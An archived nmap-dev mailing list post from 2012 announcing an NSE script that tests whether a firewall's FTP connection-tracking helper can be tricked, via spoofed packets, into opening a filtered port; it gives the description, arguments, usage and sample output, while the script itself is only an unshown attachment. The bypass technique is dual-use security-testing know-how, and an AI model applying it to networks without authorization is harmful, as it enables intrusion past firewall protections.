Nmap Development mailing list archives

Previous By Date Next
Previous By Thread Next

[NSE] firewall-bypass

From: Hani Benhabiles <kroosec () gmail com>
Date: Tue, 05 Jun 2012 22:23:36 +0100
Hi list,

description = [[
Exploits a vulnerability in netfilter and other firewalls that use helpers to dynamically open ports for protocols such as ftp and sip.
The script works by spoofing a packet from the target server asking for opening a related connection which will be fulfilled by the firewall through the target port's adequate protocol helper. The firewall should be on the same network segment as the attacking machine for this to work. Real path filter is used to prevent such attacks. The script supports only the ftp helper port at the moment. 

Based on work done by Eric Leblond.

For more information, see:
* http://home.regit.org/2012/03/playing-with-network-layers-to-bypass-firewalls-filtering-policy/ 
]]

---
-- @args firewall-bypass.helper The helper to use. Defaults to <code>ftp</code>. 
-- Supported helpers: ftp.
--
-- @args firewall-bypass.helperport If not using the helper's default port.
--
-- @args firewall-bypass.targetport Port to test vulnerability on. Target port should be a -- non-open port. If not given, the script will try to find a filtered or closed port from 
-- the port scan results.
--
-- @usage
-- nmap --script firewall-bypass <target>
-- nmap --script firewall-bypass --script-args firewall-bypass.helper="ftp", firewall-bypass.targetport=22 <target> 
--
-- @output
-- Host script results:
-- | firewall-bypass:
-- |_  Firewall vulnerable to bypass through ftp helper.


Cheers,
Hani.

--
Hani Benhabiles

Twitter: https://twitter.com/#!/kroosec
Blog: http://kroosec.blogspot.com

Attachment: firewall-bypass.nse
Description: 

_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/
Previous By Date Next
Previous By Thread Next

Current thread: